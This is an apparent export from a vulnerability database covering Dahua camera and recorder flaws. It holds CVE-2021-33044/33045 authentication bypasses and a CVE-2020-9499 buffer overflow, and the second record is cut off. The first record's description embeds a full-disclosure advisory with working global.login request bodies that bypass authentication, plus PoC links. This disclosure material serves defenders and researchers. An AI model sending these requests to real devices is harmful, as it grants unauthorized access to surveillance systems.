                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2021-33044",
                  trust: 1.8,
                  value: "CRITICAL",
               },
               {
                  author: "IPA",
                  id: "JVNDB-2024-000007",
                  trust: 0.8,
                  value: "High",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2021-103421",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2021-70816",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202109-1080",
                  trust: 0.6,
                  value: "CRITICAL",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis <mcw noemail eu> (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n               \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n        \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":<sessionID>}\n\n[Example]\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"loginType\": \"Direct\",\n        \"clientType\": \"NetKeyboard\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"Not Used\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":<sessionID>}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"[REDACTED]\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Plain\",\n        \"password\": \"admin\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n[ETX]\n\n\n\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            db: "PACKETSTORM",
            id: "164423",
         },
      ],
      trust: 3.51,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2021-33044",
            trust: 5.4,
         },
         {
            db: "PACKETSTORM",
            id: "164423",
            trust: 1.7,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
            trust: 0.8,
         },
         {
            db: "JVN",
            id: "JVN83655695",
            trust: 0.8,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
            trust: 0.8,
         },
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
            trust: 0.6,
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2021-33044",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            db: "VULMON",
            id: "CVE-2021-33044",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "PACKETSTORM",
            id: "164423",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   id: "VAR-202109-1875",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
      ],
      trust: 2.2,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "ICS",
            ],
            sub_category: null,
            trust: 0.6,
         },
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
      ],
   },
   last_update_date: "2024-01-19T23:24:12.199000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Dahua Technology : DHCC-SA-202106-001",
            trust: 0.8,
            url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
         },
         {
            title: "DHCC-SA-202106-001",
            trust: 0.8,
            url: "https://www.dahuasecurity.com/aboutus/trustedcenter/details/582",
         },
         {
            title: "Patch for Dahua IPC authentication bypass vulnerability",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/311536",
         },
         {
            title: "Patch for Identity authentication bypass vulnerabilities in some Dahua products",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/290751",
         },
         {
            title: "Dahua  IPC Remediation measures for authorization problem vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164675",
         },
         {
            title: "PoC",
            trust: 0.1,
            url: "https://github.com/mcw0/poc ",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            db: "VULMON",
            id: "CVE-2021-33044",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-287",
            trust: 1,
         },
         {
            problemtype: "Inappropriate authentication (CWE-287) [NVD evaluation ]",
            trust: 0.8,
         },
         {
            problemtype: "Inappropriate authentication (CWE-287) [IPA evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "http://seclists.org/fulldisclosure/2021/oct/13",
         },
         {
            trust: 2.3,
            url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
         },
         {
            trust: 2.2,
            url: "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html",
         },
         {
            trust: 1.5,
            url: "https://nvd.nist.gov/vuln/detail/cve-2021-33044",
         },
         {
            trust: 0.8,
            url: "https://jvn.jp/jp/jvn83655695/index.html",
         },
         {
            trust: 0.1,
            url: "https://github.com/mcw0/poc",
         },
         {
            trust: 0.1,
            url: "https://github.com/mcw0/dahuaconsole",
         },
         {
            trust: 0.1,
            url: "https://www.dahuasecurity.com/support/downloadcenter/firmware",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2021-33045",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            db: "VULMON",
            id: "CVE-2021-33044",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "PACKETSTORM",
            id: "164423",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            db: "VULMON",
            id: "CVE-2021-33044",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "PACKETSTORM",
            id: "164423",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-12-30T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            date: "2021-09-14T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            date: "2022-08-31T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            date: "2024-01-18T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            date: "2021-10-06T15:11:51",
            db: "PACKETSTORM",
            id: "164423",
         },
         {
            date: "2021-09-15T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
         {
            date: "2021-09-15T22:15:10.497000",
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-01-18T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            date: "2021-09-14T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            date: "2022-08-31T04:47:00",
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            date: "2024-01-18T03:08:00",
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            date: "2021-10-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
         {
            date: "2021-12-02T13:50:00.800000",
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Dahua  Product certification vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "authorization issue",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202109-1080",
         },
      ],
      trust: 0.6,
   },
}

var-202004-1823
Vulnerability from variot

Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down. Dahua The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202004-1823",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "ipc-hx7842h",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n42b3p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd1a",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n42b2p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52b3p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52b2p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52a4p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd50",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52b5p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hx5842h",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n42b1p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd5a",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd6al",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n54a4p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hxxx5x4x",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ptz1a",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd52c",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n54b2p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hx2xxx",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hx2xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx5842h",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx7842h",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hxxx5x4x",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz1a",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd1a",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd50",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd52c",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd5a",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd6al",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 6al series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 5a series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 1a series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd 50/52c series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "nvr n5x series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "nvr n4x series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc n4 series",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
